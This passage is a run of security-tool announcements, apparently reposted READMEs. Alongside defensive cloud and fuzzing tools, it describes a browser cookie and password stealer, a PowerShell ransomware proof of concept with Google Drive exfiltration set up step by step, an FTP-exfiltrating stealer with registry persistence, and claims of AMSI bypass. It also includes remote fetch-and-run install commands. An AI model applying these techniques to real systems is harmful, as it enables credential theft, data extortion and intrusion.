If the VirusTotal URL is specified in the configuration then metadata such as file hashes, timestamps, etc will be sent to VirusTotal for processing when the user clicks on highlighted links or selects "VirusTotal search" from the right-click context menu.

CyberChef
If the CyberChef URL is present in the configuration then any file data will be base64 encoded and sent to CyberChef for processing when the user selects "CyberChef" from the right-click context menu.

Troubleshooting

AttributeError: module 'pip' has no attribute 'main'
or

PyQt5 fails to install under Linux
Try to upgrade pip to version 20.0+:
$ pip install --upgrade pip

ModuleNotFoundError: No module named 'PyQt5.sip'
Try uninstalling and reinstalling PyQt5 as follows:
pip uninstall PyQt5
pip uninstall PyQt5-sip
pip install PyQt5 PyQt5-sip

Missing imports after dumping
Ensure IDA has found and disassembled all code:
Options -> General -> Analysis -> Reanalyze program
After this is completed try to dump/rebuild imports again.

Contributing
Please feel free to contribute! Issues and pull requests are most welcome.

Developer documentation
To build documentation from source using Sphinx:
$ pip install sphinx
$ sphinx-apidoc -o ./doc/source/ .
$ sphinx-build -b html ./doc/source ./doc/build -E
To view the documentation open ./doc/build/index.html in a web-browser.



SkyArk - Helps To Discover, Assess And Secure The Most Privileged Entities In Azure And AWS

$
0
0

SkyArk is a cloud security project with two main scanning modules:
  1. AzureStealth - Scans Azure environments
  2. AWStealth - Scan AWS environments

These two scanning modules will discover the most privileged entities in the target AWS and Azure.

The Main Goal - Discover The Most Privileged Cloud Users
SkyArk currently focuses on mitigating the new threat of Cloud Shadow Admins, and helps organizations to discover, assess and protect cloud privileged entities.
Stealthy and undercover cloud admins may reside in every public cloud platform and SkyArk helps mitigating the risk in AWS and Azure.
In defensive/pentest/risk assessment procedures - make sure to address the threat and validate that those privileged entities are indeed well secured.

Background:
SkyArk deals with the new uprising threat of Cloud Shadow Admins - how attackers can find and abuse non-trivial and so-called “limited” permissions to still make it through and escalate their privileges and become full cloud admins.
Furthermore, attackers can easily use those tricky specific permissions to hide stealthy admin entities that will wait for them as an undercover persistence technique.
SkyArk was initially published as part of our research on the threat of AWS Shadow Admins, this research was presented at RSA USA 2018 conference.
The AWS Shadow Admins blog post:
https://www.cyberark.com/threat-research-blog/cloud-shadow-admin-threat-10-permissions-protect/
The recording of the RSA talk:
https://www.rsaconference.com/videos/sneak-your-way-to-cloud-persistenceshadow-admins-are-here-to-stay
About a year later, we added the AzureStealth scan to SkyArk for mitigating the Shadow Admins threat in Azure!

Tool Description
SkyArk currently contains two main scanning modules AWStealth and AzureStealth.
With the scanning results - organizations can discover the entities (users, groups and roles) who have the most sensitive and risky permissions.
In addition, we also encourage organizations to scan their environments from time to time and search for suspicious deviations in their privileged entities list.
Potential attackers are hunting for those users and the defensive teams should make sure these privileged users are well secured - have strong, rotated and safety stored credentials, have MFA enabled, being monitored carefully, etc.
Remember that we cannot protect the things we don’t aware of, and SkyArk helps in the complex mission of discovering the most privileged cloud entities - including the straight-forward admins and also the stealthy shadow admins that could easily escalate their privileges and become full admins as well.

1. AzureStealth Scan
Discover the most privileged users in the scanned Azure environment - including the Azure Shadow Admins.
How To Run AzureStealth
The full details are in the AzureStealth's Readme file:
https://github.com/cyberark/SkyArk/blob/master/AzureStealth/README.md
In short:
  1. Download/sync locally the SkyArk project
  2. Open PowerShell in the SkyArk folder with the permission to run scripts:
    "powershell -ExecutionPolicy Bypass -NoProfile"
  3. Run the following commands:
(1) Import-Module .\SkyArk.ps1 -force
(2) Start-AzureStealth
AzureStealth needs only Read-Only permissions over the scanned Azure Directory (Tenant) and Subscription.
*You can also run the scan easily from within the Azure Portal by using the built-in CloudShell:
   (1) IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cyberark/SkyArk/master/AzureStealth/AzureStealth.ps1')  
(2) Scan-AzureAdmins

AzureStealth DEMO:


2. AWStealth Scan
Discover the most privileged entities in the scanned AWS environment - including the Azure Shadow Admins.
How To Run AWStealth
The full details are in the AWStealth's Readme file:
https://github.com/cyberark/SkyArk/tree/master/AWStealth
In short:
  1. Download/sync locally the SkyArk project
  2. Open PowerShell in the SkyArk folder with the permission to run scripts:
    "powershell -ExecutionPolicy Bypass -NoProfile"
  3. Run the following commands:
(1) Import-Module .\SkyArk.ps1 -force
(2) Start-AWStealth
AWStealth needs only Read-Only permissions over the IAM service of the scanned AWS environment.

AWStealth DEMO:


3. SkyArk includes more small sub-modules for playing around in the cloud security field
An example for such a sub-module is AWStrace module.
AWStrace - analyzes AWS CloudTrail Logs and can provide new valuable insights from CloudTrail logs.
It especially prioritizes risky sensitive IAM actions that potential attackers might use as part of their malicious actions as AWS Shadow Admins.
The module analyzes the log files and produces informative csv result file with important details on each executed action in the tested environment.
Security teams can use the results files to investigate sensitive actions, discover the entities that took those actions and reveal additional valuable details on each executed and logged action.

Quick Start
Take a look at the Readme files of the scanning modules:
AzureStealth - https://github.com/cyberark/SkyArk/blob/master/AzureStealth/README.md
AWStealth - https://github.com/cyberark/SkyArk/blob/master/AWStealth/README.md

Share Your Thoughts And Feedback
Asaf Hecht (@Hechtov) and CyberArk Labs
More coverage on the uprising Cloud Shadow Admins threat:
ThreatPost: https://threatpost.com/cloud-credentials-new-attack-surface-for-old-problem/131304/
TechTarget\SearchCloudSecurity: https://searchcloudsecurity.techtarget.com/news/252439753/CyberArk-warns-of-shadow-admins-in-cloud-environments
SecurityBoulevard: https://securityboulevard.com/2018/05/cyberark-shows-how-shadow-admins-can-be-created-in-cloud-environments/
LastWatchDog: https://www.lastwatchdog.com/cyberark-shows-how-shadow-admins-can-be-created-in-cloud-environments/
Byron Acohido's Podcast: https://soundcloud.com/byron-acohido/cloud-privileged-accounts-flaws-exposed


SharpChromium - .NET 4.0 CLR Project To Retrieve Chromium Data, Such As Cookies, History And Saved Logins

$
0
0

SharpChromium is a .NET 4.0+ CLR project to retrieve data from Google Chrome, Microsoft Edge, and Microsoft Edge Beta. Currently, it can extract:
  • Cookies (in JSON format)
  • History (with associated cookies for each history item)
  • Saved Logins
Note: All cookies returned are in JSON format. If you have the extension Cookie Editor installed, you can simply copy and paste into the "Import" seciton of this browser addon to ride the extracted session.

Advantages
This rewrite has several advantages to previous implementations, which include:
  • No Type compilation or reflection required
  • Cookies are displayed in JSON format, for easy importing into Cookie Editor.
  • No downloading SQLite assemblies from remote resources.
  • Supports major Chromium browsers (but extendable to others)

Usage
Usage:
.\SharpChromium.exe arg0 [arg1 arg2 ...]

Arguments:
all - Retrieve all Chromium Cookies, History and Logins.
full - The same as 'all'
logins - Retrieve all saved credentials that have non-empty passwords.
history - Retrieve user's history with a count of each time the URL was
visited, along with cookies matching those items.
cookies [domain1.com domain2.com] - Retrieve the user's cookies in JSON format.
If domains are passed, then return only
cookies matching those domains. Otherwise,
all cookies are saved into a temp file of
the format ""%TEMP%\$browser-cookies.json""

Examples
Retrieve cookies associated with Google Docs and Github
.\SharpChromium.exe cookies docs.google.com github.com


Retrieve history items and their associated cookies.
.\SharpChromium.exe history


Retrieve saved logins (Note: Only displays those with non-empty passwords):
.\SharpChromium.exe logins


Notes on the SQLite Parser
The SQLite database parser is slightly bugged. This is due to the fact that the parser correctly detects data blobs as type System.Byte[], but it does not correctly detect columns of type System.Byte[]. As a result, the byte arrays get cast to the string literal "System.Byte[]", which is wrong. I haven't gotten to the root of this cause, but as a quick and dirty workaround I have encoded all blob values as Base64 strings. Thus if you wish to retrieve a value from a column whose regular data values would be a byte array, you'll need to Base64 decode them first.

Special Thanks
A large thanks to @plainprogrammer for their C#-SQLite project which allowed for native parsing of the SQLite files without having to reflectively load a DLL. Without their work this project would be nowhere near as clean as it is. That project can be found here: https://github.com/plainprogrammer/csharp-sqlite
Thanks to @gentlekiwi whose work on Mimikatz guided the rewrite for the decryption schema in v80+
Thanks to @harmj0y who carved out the requisite PInvoke BCrypt code so I could remove additional dependencies from this project, making it light-weight again.


Nautilus - A Grammar Based Feedback Fuzzer

$
0
0

Nautilus is a coverage guided, grammar based fuzzer. You can use it to improve your test coverage and find more bugs. By specifying the grammar of semi valid inputs, Nautilus is able to perform complex mutation and to uncover more interesting test cases. Many of the ideas behind this fuzzer are documented in a Paper published at NDSS 2019.


Version 2.0 has added many improvements to this early prototype and is now 100% compatible with AFL++. Besides general usability improvements, Version 2.0 includes lots of shiny new features:
  • Support for AFL-Qemu mode
  • Support for grammars specified in python
  • Support for non-context free grammars using python scripts to generate inputs from the structure
  • Support for specifying binary protocols/formats
  • Support for specifying regex based terminals that aren't part of the directed mutations
  • Better ability to avoid generating the same very short inputs over and over
  • Massive cleanup of the code base
  • Helpful error output on invalid grammars
  • Fixed a bug in the the timeout code that occasionally deadlocked the fuzzer

How Does Nautilus Work?
You specify a grammar using rules such as EXPR -> EXPR + EXPR or EXPR -> NUM and NUM -> 1. From these rules, the fuzzer constructs a tree. This internal representation allows to apply much more complex mutations than raw bytes. This tree is then turned into a real input for the target application. In normal Context Free Grammars, this process is straightforward: all leaves are concatenated. The left tree in the example below would unparse to the input a=1+2 and the right one to a=1+1+1+2. To increase the expressiveness of your grammars, using Nautilus you are able to provide python functions for the unparsing process to allow much more complex specifications.


Setup
# checkout the git
git clone 'git@github.com:nautilus-fuzz/nautilus.git'
cd nautilus
/path/to/AFLplusplus/afl-clang-fast test.c -o test #afl-clang-fast as provided by AFL

# all arguments can also be set using the config.ron file
cargo run --release -- -g grammars/grammar_py_example.py -o /tmp/workdir -- ./test @@

# or if you want to use QEMU mode:
cargo run /path/to/AFLplusplus/afl-qemu-trace -- ./test_bin @@

Examples
Here, we use python to generate a grammar for valid xml-like inputs. Notice the use of a script rule to ensure the the opening and closing tags match.
#ctx.rule(NONTERM: string, RHS: string|bytes) adds a rule NONTERM->RHS. We can use {NONTERM} in the RHS to request a recursion. 
ctx.rule("START","<document>{XML_CONTENT}</document>")
ctx.rule("XML_CONTENT","{XML}{XML_CONTENT}")
ctx.rule("XML_CONTENT","")

#ctx.script(NONTERM:string, RHS: [string]], func) adds a rule NONTERM->func(*RHS).
# In contrast to normal `rule`, RHS is an array of nonterminals.
# It's up to the function to combine the values returned for the NONTERMINALS with any fixed content used.
ctx.script("XML",["TAG","ATTR","XML_CONTENT"], lambda tag,attr,body: b"<%s %s>%s</%s>"%(tag,attr,body,tag) )
ctx.rule("ATTR","foo=bar")
ctx.rule("TAG","some_tag")
ctx.rule("TAG","other_tag")

#sometimes we don't want to explore the set of possible inputs in more detail. For example, if we fuzz a script
#interpreter, we don't want to spend time on fuzzing all different variable names. In such cases we can use Regex
#terminals. Regex terminals are only mutated during generation, but not during normal mutation stages, saving a lot of time.
#The fuzzer still explores different values for the regex, but it won't be able to learn interesting values incrementally.
#Use this when incremantal exploration would most likely waste time.

ctx.regex("TAG","[a-z]+")
To test your grammars you can use the generator:
$ cargo run --bin generator -- -g grammars/grammar_py_exmaple.py -t 100 
<document><some_tag foo=bar><other_tag foo=bar><other_tag foo=bar><some_tag foo=bar></some_tag></other_tag><some_tag foo=bar><other_tag foo=bar></other_tag></some_tag><other_tag foo=bar></other_tag><some_tag foo=bar></some_tag></other_tag><other_tag foo=bar></other_tag><some_tag foo=bar></some_tag></some_tag></document>
You can also use Nautilus in combination with AFL. Simply point AFL -o to the same workdir, and AFL will synchronize with Nautilus. Note that this is one way. AFL imports Nautilus inputs, but not the other way around.
#Terminal/Screen 1
./afl-fuzz -Safl -i /tmp/seeds -o /tmp/workdir/ ./test @@

#Terminal/Screen 2
cargo run --release -- -o /tmp/workdir -- ./test @@

Trophies


Bastillion - A Web-Based SSH Console That Centrally Manages Administrative Access To Systems

$
0
0

Bastillion is a web-based SSH console that centrally manages administrative access to systems. Web-based administration is combined with management and distribution of user's public SSH keys. Key management and administration is based on profiles assigned to defined users.
Administrators can login using two-factor authentication with Authy or Google Authenticator. From there they can manage their public SSH keys or connect to their systems through a web-shell. Commands can be shared across shells to make patching easier and eliminate redundant command execution.
Bastillion layers TLS/SSL on top of SSH and acts as a bastion host for administration. Protocols are stacked (TLS/SSL + SSH) so infrastructure cannot be exposed through tunneling / port forwarding. More details can be found in the following whitepaper: Implementing a Trusted Third-Party System for Secure Shell. Also, SSH key management is enabled by default to prevent unmanaged public keys and enforce best practices.

Bastillion Releases
Bastillion is available for free use under the Affero General Public License
https://github.com/bastillion-io/Bastillion/releases
or purchase from the AWS marketplace
https://aws.amazon.com/marketplace/pp/Loophole-LLC-Bastillion/B076PNFPCL
Also, Bastillion can be installed on FreeBSD via the FreeBSD ports system. To install via the binary package, simply run:
pkg install security/bastillion

Prerequisites
Open-JDK / Oracle-JDK - 1.9 or greater
apt-get install openjdk-9-jdk
http://www.oracle.com/technetwork/java/javase/downloads/index.html
Install Authy or Google Authenticator to enable two-factor authentication with Android or iOS
ApplicationAndroidiOS
AuthyGoogle PlayiTunes
Google AuthenticatorGoogle PlayiTunes

To Run Bundled with Jetty
Download bastillion-jetty-vXX.XX.tar.gz
https://github.com/bastillion-io/Bastillion/releases
Export environment variables
for Linux/Unix/OSX
 export JAVA_HOME=/path/to/jdk
export PATH=$JAVA_HOME/bin:$PATH
for Windows
 set JAVA_HOME=C:\path\to\jdk
set PATH=%JAVA_HOME%\bin;%PATH%
Start Bastillion
for Linux/Unix/OSX
    ./startBastillion.sh
for Windows
    startBastillion.bat
More Documentation at: https://www.bastillion.io/docs/index.html

Build from Source
Install Maven 3 or greater
apt-get install maven
http://maven.apache.org
Install Loophole MVC
https://github.com/bastillion-io/lmvc
Export environment variables
export JAVA_HOME=/path/to/jdk
export M2_HOME=/path/to/maven
export PATH=$JAVA_HOME/bin:$M2_HOME/bin:$PATH
In the directory that contains the pom.xml run
mvn package jetty:run
Note: Doing a mvn clean will delete the H2 DB and wipe out all the data.

Using Bastillion
Open browser to https://<whatever ip>:8443
Login with
username:admin
password:changeme
Note: When using the AMI instance, the password is defaulted to the <Instance ID>. Also, the AMI uses port 443 as in https://<Instance IP>:443

Managing SSH Keys
By default Bastillion will overwrite all values in the specified authorized_keys file for a system. You can disable key management by editing BastillionConfig.properties file and use Bastillion only as a bastion host. This file is located in the jetty/bastillion/WEB-INF/classes directory. (or the src/main/resources directory if building from source)
#set to false to disable key management. If false, the Bastillion public key will be appended to the authorized_keys file (instead of it being overwritten completely).
keyManagementEnabled=false
Also, the authorized_keys file is updated/refreshed periodically based on the relationships defined in the application. If key management is enabled the refresh interval can be specified in the BastillionConfig.properties file.
#authorized_keys refresh interval in minutes (no refresh for <=0)
authKeysRefreshInterval=120
By default Bastillion will generated and distribute the SSH keys managed by administrators while having them download the generated private. This forces admins to use strong passphrases for keys that are set on systems. The private key is only available for download once and is not stored on the application side. To disable and allow administrators to set any public key edit the BastillionConfig.properties.
#set to true to generate keys when added/managed by users and enforce strong passphrases set to false to allow users to set their own public key
forceUserKeyGeneration=false

Supplying a Custom SSH Key Pair
Bastillion generates its own public/private SSH key upon initial startup for use when registering systems. You can specify a custom SSH key pair in the BastillionConfig.properties file.
For example:
#set to true to regenerate and import SSH keys  --set to true
resetApplicationSSHKey=true

#SSH Key Type 'dsa' or 'rsa'
sshKeyType=rsa

#private key --set pvt key
privateKey=/Users/kavanagh/.ssh/id_rsa

#public key --set pub key
publicKey=/Users/kavanagh/.ssh/id_rsa.pub

#default passphrase --leave blank if passphrase is empty
defaultSSHPassphrase=myPa$$w0rd
After startup and once the key has been registered it can then be removed from the system. The passphrase and the key paths will be removed from the configuration file.

Adjusting Database Settings
Database settings can be adjusted in the configuration properties.
#Database user
dbUser=bastillion
#Database password
dbPassword=p@$$w0rd!!
#Database JDBC driver
dbDriver=org.h2.Driver
#Connection URL to the DB
dbConnectionURL=jdbc:h2:keydb/bastillion;CIPHER=AES;
By default the datastore is set as embedded, but a remote H2 database can supported through adjusting the connection URL.
#Connection URL to the DB
dbConnectionURL=jdbc:h2:tcp://<host>:<port>/~/bastillion;CIPHER=AES;

External Authentication
External Authentication can be enabled through the BastillionConfig.properties.
For example:
#specify a external authentication module (ex: ldap-ol, ldap-ad).  Edit the jaas.conf to set connection details
jaasModule=ldap-ol
Connection details need to be set in the jaas.conf file
ldap-ol {
com.sun.security.auth.module.LdapLoginModule SUFFICIENT
userProvider="ldap://hostname:389/ou=example,dc=bastillion,dc=com"
userFilter="(&(uid={USERNAME})(objectClass=inetOrgPerson))"
authzIdentity="{cn}"
useSSL=false
debug=false;
};
Administrators will be added as they are authenticated and profiles of systems may be assigned by full-privileged users.
User LDAP roles can be mapped to profiles defined in Bastillion through the use of the org.eclipse.jetty.jaas.spi.LdapLoginModule.
ldap-ol-with-roles {
//openldap auth with roles that can map to profiles
org.eclipse.jetty.jaas.spi.LdapLoginModule required
debug="false"
useLdaps="false"
contextFactory="com.sun.jndi.ldap.LdapCtxFactory"
hostname="<SERVER>"
port="389"
bindDn="<BIND-DN>"
bindPassword="<BIND-DN PASSWORD>"
authenticationMethod="simple"
forceBindingLogin="true"
userBaseDn="ou=users,dc=bastillion,dc=com"
userRdnAttribute="uid"
userIdAttribute="uid"
userPasswordAttribute="userPassword"
userObjectClass="inetOrgPerson"
roleBaseDn="ou=groups,dc=bastillion,dc=com"
roleNameAttribute="cn"
roleMemberAttribute="member"
roleObjectClass="groupOfNames";
};
Users will be added/removed from defined profiles as they login and when the role name matches the profile name.

Auditing
Auditing is disabled by default. Audit logs can be enabled through the log4j2.xml by uncommenting the io.bastillion.manage.util.SystemAudit and the audit-appender definitions.
https://github.com/bastillion-io/Bastillion/blob/master/src/main/resources/log4j2.xml#L19-L22
Auditing through the application is only a proof of concept. It can be enabled in the BastillionConfig.properties.
#enable audit  --set to true to enable
enableInternalAudit=true

Screenshots








Acknowledgments
Special thanks goes to these amazing projects which makes this (and other great projects) possible.
Third-party dependencies are mentioned in the 3rdPartyLicenses.md

Author
Loophole, LLC - Sean Kavanagh


AWS Report - A Tool For Analyzing Amazon Resources

$
0
0

AWS Report is a tool for analyzing amazon resources.

Install using PIP
pip install awsreport

Features
  • Search IAM users based on creation date
  • Search buckets public
  • Search security based in rules, default is 0.0.0.0/0
  • Search elastic ip dissociated
  • Search volumes available
  • Search AMIs with permission public
  • Search internet gateways detached

Options
aws_report.py [OPTIONS]

Options:
--s3 Search buckets public in s3
--iam Search iam users based on creation date
--iam-max-age Use max-age to search for users created more than X days ago
--sg Search security groups with inbound specific rule
--elasticip Search elastic IP not associated
--volumes Search volumes available
--ami Search AMIs with permission public
--owner Defines the owner of the resources to be found
--igw Search internet gateways detached
--help Show this message and exit.

Examples:
python awsreport.py --s3
python awsreport.py --iam --owner 296192063842
python awsreport.py --iam --iam-max-age 60
python awsreport.py --sg --cidr 192.168.1.0/24 or
python awsreport.py --sg (cidr default is 0.0.0.0)

Developer contact
[+] Twitter: @bsd0x1
[+] Telegram: @bsd0x
[+] Github: /bsd0x


DAGOBAH - Open Source Tool To Generate Internal Threat Intelligence, Inventory & Compliance Data From AWS Resources

$
0
0

Dagobah is an open source tool written in python to automate the internal threat intelligence generation, inventory collection and compliance check from different AWS resources. Dagobah collects information and save the state into an elasticsearch index.
Dagobah runs into the a LAMBDA and looks at all the AWS REGIONS, actually collect differents configurations from:
  • EC2
  • VPC
  • ENI
  • SecurityGroups

DAGOBAH GOAL:
  • Add IOC and store them into elasticsearch/s3.
  • Live centralized inventory/config information related to AWS/NON-AWS resources.
  • Automatically evaluate resources against other platforms/analyzers.

AWS services/resources:
  • VPC
  • EC2
  • ENI
  • Security Groups

Non-AWS resources:
  • WAZUH (comming soon)

Code layout:
./
|- dagobah.py (main control for manual/automated exec)
|- modules/
|- collector.py (query collection objects)
|- iam_aws.py (iam stuff for aws multi account-role)
|- setup.py (elk setup)
|- analizer.py (analyzer for add external info to the collector)

How works:


Ideally a Cloudwatch event is triggered the lambda every XXX with the account, role, and inventory type (all) to collect. The lambda gets the cloudwatch and iterates the accounts/role/inventory to start querying the AWS EC2 API with boto3 (not extra charges for use) and for different resources, an additional analyzer is triggered to get context information like:
  • wazuh information (comming soon)
  • running time EC2
  • security group rule status (open/closed) Each result is stored in the inventory index of elasticsearch.

Future integrations:
  • lambda functions
  • aws elb/nlb
  • dns route53
  • iam / trustadvisor
  • s3 buckets
  • eks/fargate
  • transit-gateways
  • api gateway


Unfollow-Plus - Automated Instagram Unfollower Bot

$
0
0

Automated Instagram Unfollower Bot.

Installation :
  • apt update
  • apt install git curl -y
  • git clone git://github.com/htr-tech/unfollow-plus.git
  • cd unfollow-plus

> Run : bash unfollower.sh

Single Command :
apt update ; apt install git curl -y ; git clone git://github.com/htr-tech/unfollow-plus.git ; cd unfollow-plus ; bash unfollower.sh

Credits :

Code is Taken From InsHackle By [The Linux Choice] (https://github.com/thelinuxchoice)

Features :

[+] Hidden Password Added !
[+] 100 % secure !
[+] Easy for Beginners !



Phirautee - A PoC Crypto Virus To Spread User Awareness About Attacks And Implications Of Ransomwares

$
0
0

A proof of concept crypto virus to spread user awareness about attacks and implications of ransomwares. Phirautee is written purely using PowerShell and does not require any third-party libraries. This tool steals the information, holds an organisation’s data to hostage for payments or permanently encrypts/deletes the organisation data.
Phirautee is a Living off the Land (LotL) ransomware which means it utilises legit powershell commands and operations to work against the operating system.

Screenshots
  • Ransom pop-up window:

  • Desktop background upon successful infection:

DEF CON Presentation
https://speakerdeck.com/viralmaniar/phirautee-defcon28-writing-ransomware-using-living-off-the-land-lotl-tactics


Legal Disclaimer
This project must not be used for illegal purposes or for hacking into system where you do not have permission, it is strictly for educational purposes and for people to experiment with.

  • Performing any hack attempts or tests without written permission from the owner of the computer system is illegal.
  • If you recently suffered a breach or targeted by a ransomware and found techniques or tools illustrated in this presentation similar, this neither incriminates my involvement in any way, nor implies any connection between myself and the attackers.
  • The tools and techniques remain universal and penetration testers and security consultants often uses them during engagements.
  • Phirautee project must not be used for illegal purposes. It is strictly for educational and research purposes and for people to experiment with.

DEF CON 28 Safe Mode
Over the past few years, ransomware has gone wild and organisations around the world are getting targeted leading to the damage and disruption. As we all know that the threat landscape is changing rapidly and we hear the fuss about ransomware infection at the offices or read about it in the news. Have you ever wondered how threat actors are writing ransomwares? What level of sophistication and understanding is required to target an organisation? In this demo, we will utilise the native Windows commands to build ransomware and target a host via phishing. Introducing Phirautee, a proof of concept crypto virus to spread user awareness about attacks and implications of ransomwares. Phirautee is written purely using PowerShell and does not require any third-party libraries. This tool steals the information, holds an organisation's data to hostage for payments or permanently encrypts/deletes the organisation data. The tool uses public-key cryptography to encrypt the data on the disk. Be fore encrypting, it exfiltrates the files from the network to the attacker. Once the files are encrypted and exfiltrated, the original files are permanently deleted from the host and then tool demands a ransom. The ransom is asked using the cryptocurrency for payments, so transactions are more difficult for law enforcement to trace. During the demonstration of Phirautee, you will see a complete attack chain i.e. from receiving ransomware attack via a phishing email and how the files get encrypted on the compromised systems. A detailed walkthrough of the source code would be provided to understand how hackers utilise simple methods to create something dangerous. I will end the demo with several defence mechanisms by performing forensics analysis on Phirautee using publicly available tools.

Phirautee Introduction
  • Phirautee is a proof of concept ransomware tool written purely using PowerShell.
  • It uses Living off the Land (LotL) commands to work against the operating system to encrypt files on the machine.
  • This tool can be used during internal infrastructure penetration testing or during the red team exercise to validate Blue Team/SOC response to ransom attacks.
  • It uses public key cryptography to encrypt user content and exfiltrates large files via Google Drive.
  • Upon successful attack the ransomware asks for a payment of 0.10 BTC (~1k USD).
  • Detection:
    • File extension of the encrypted files are changed to “.phirautee”
    • Desktop wallpaper of the compromised host is changed with Phirautee background
    • Desktop will have Phirautee.txt file

Phirautee Attack Setup
  • Phishing server and domain to target an organisation.
  • Email server to send malicious documents as an attachment to the targeted user.
  • Macro embedded file as an attachment to user which pulls the ransomware from the remote server to targeted machine and runs it in a memory.
  • Modify couple of parameters in the ransomware file to utilise it for your use case.
  • For data exfiltration:
    • Throwaway Gmail account
    • Gmail API access to a throwaway Google Drive
    • Setup web application on the Google

Steps for setting up Data Exfilteration using Google Drive
Google offers a REST API that can be accessed via PowerShell to perform operations on the files such as upload, download and delete. The REST API allows you to leverage Google Drive storage from within your app.


Please follow below steps to perform exfilteration via phirautee ransomware.
Step 1: Visit https://console.cloud.google.com/cloud-resource-manager
Step 2: Click on "CREATE PROJECT"


Step 3: Once the project is created enable the Google Drive API by click on the "ENABLE APIS AND SERVICES".


Step 4: Locate the Google Drive related APIs in the AOI Library:


Step 5: Once located enable the API. This would allow access to various operations via Google Drive.


Step 6: After enabling the API access click on the "create credentials" button.


Step 7: Now create OAuth Client ID Credentials


Step 8: Select Web Application as product type and configure the authorized redirect URI to https://developers.google.com/oauthplayground


Step 9: Save your client ID and Secret. If you dont this can always be accessed from credentials in APIs & Services. Now browse to https://developers.google.com/oauthplayground
Step 10: Click on the gear icon and tick on the "Use your own OAuth credentials"


Step 11: Authorize the https://www.googleapis.com/auth/drive API and then Click “Exchange authorization code for tokens”. This should give you 200 OK in the response. Make sure you save your refresh access token. We will need this in the Phirautee to upload large files to the throwaway Google account.



Use of Symmetric Keys & Anonymous SMTP Service
  • Phirautee uses two unique symmetric keys
    • One for the private key of the certificate that’s being generated on the user machine.
    • The other one for uploading exfiltrated data on Google Drive
  • The private keys are sent to Pokemail as a zip encrypted files.
  • Phirautee uses Pokemail services to distribute the attack infrastructure by creating a random location based email address.


  • Uses 2048 bits RSA key to encrypt files on the infected machine.
  • Private key of the certificate gets sent to attacker using a pre-shared secret aka symmetric keys.

IoCs for Phirautee
File paths:
C:\temp\cert.cer
c:\temp\sys.txt
c:\temp\backup.zip
c:\temp\sys1.txt
c:\temp\steal.zip
C:\users\$env:USERNAME\PhirauteeBackground-3.jpg

MD5s:
77EA9D33D144072F7B35C10691124D16
4E123FF3A7833F0C8AC6F749D337444D

Domains used for exfil:
https://smtp.pokemail.net
https://www.googleapis.com
https://accounts.google.com
https://raw.githubusercontent.com

Registry files:
HKCU:\Control Panel\Desktop

Mitigation Strategies
  • Network segmentation and detection of lateral movement. Follow principle of least privilege access or restrict access to sensitive servers. Make use of MFA on all important portals.
  • Disable PowerShell for standard domain users and perform application whitelisting.
  • Frequent network wide backups (if possible offline).
  • Apply patches and have a vulnerability management program.
  • Have a dedicated incident response team and develop a plan for ransomware events.
  • Invest in a good IDS/IPS/EDR/AV/CASB product.
  • Validate the effectiveness of your defense tools and technologies through pre-approved offensive exercise.
  • Organise phishing and user education training sessions for your employees.
  • Have cyber insurance to help cover costs in case you need to pay the ransom. Furthermore, get your insurance policies reviewed to make sure there are no holes.
  • Take help from local feds for the decryption keys.

Contribution & License
MIT License
Copyright (c) 2020 Viral Maniar
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
Any suggestions or ideas for this tool are welcome - just tweet me on @ManiarViral


CheckXSS - Detect XSS vulnerability in Web Applications

$
0
0

Detect XSSvulnerability in Web Applications

Screenshots


Easy Installation
As simple as below, Just one line of code:
curl -L -s https://raw.githubusercontent.com/Jewel591/CheckXSS/master/docs/install.sh|bash

Usage Instructions
python3.6 checkxss.py -h


Support POST and GET request methods, support parameter injection detection in cookie, referer, useragent fields For example, test the returnUrl parameter in POST data:
python3.6 checkxss.py -u "https://example.com/login.do" --data="returnUrl=utest" -p returnUrl


Features
  1. Support url encoding bypass
  2. Support unicode encoding of HTML tag attribute value to bypass
  3. Support HTML encoding to bypass the HTML tag attribute value
  4. Support for flexible replacement of () '"to bypass
  5. Case bypass

Contributing
Contributions, issues and feature requests are welcome!
Feel to check issues page

Maintainers
@Jewel591


Spybrowse - Code Developed To Steal Certain Browser Config Files (History, Preferences, Etc)

$
0
0

Be sure to change the ftp variables throughout the code, these variables contain the username, password, & IP address of the FTP server which receives the files.
This code will do the following:
  1. Copy itself into the %TMP% directory & name itself ursakta.exe
  2. Add a registry entry to execute itself each time the user logs in
  3. Verify which browser the user is using (Chrome, Firefox or Brave)
  4. Search for files within the Chrome, Firefox, or Brave browser directories
  5. Create a directory on our FTP server then send the files in the browser's directory to the FTP server

Cross Compiling with MingW on Linux
Install command with Apt:
  • sudo apt-get install mingw-w64
64-bit:
  • x86_64-w64-mingw32-gcc *input file* -o *output file* -lwininet -lversion
32-bit:
  • i686-w64-mingw32-gcc *input file* -o *output file* -lwininet -lversion

From Victim's Perspective:
Registry entry:


File activity:



FTP connection:


Detection Rate:
This detection rate is after stripping the executable with strip --strip-all *filename.c*




PowerSharpPack - Many usefull offensive CSharp Projects wraped into Powershell for easy usage

$
0
0

Many usefull offensive CSharp Projects wraped into Powershell for easy usage.
Why? In my personal opinion offensive Powershell is not dead because of AMSI, Script-block-logging, Constrained Language Mode or other protection features. Any of these mechanisms can be bypassed. Since most new innovative offensive security projects are written in C# I decided to make them usable in powershell as well.

So what did i basically do here?
  1. First of all clone each C# Repo.
  2. Set the class and main methods public
  3. For some projects i merged pull requests with new features or bug fixes or i had to remove environment.exit statements so that the whole powershell process is not killed for missing parameters and so on
  4. Afterwards compiling each binary
  5. Encode the compiled binary base64 and load it in powershell via [System.Reflection.Assembly]::Load([Convert]::FromBase64String()).
Its a very easy but for many repos time consuming process.
Which tools are included?
Internalmonologue
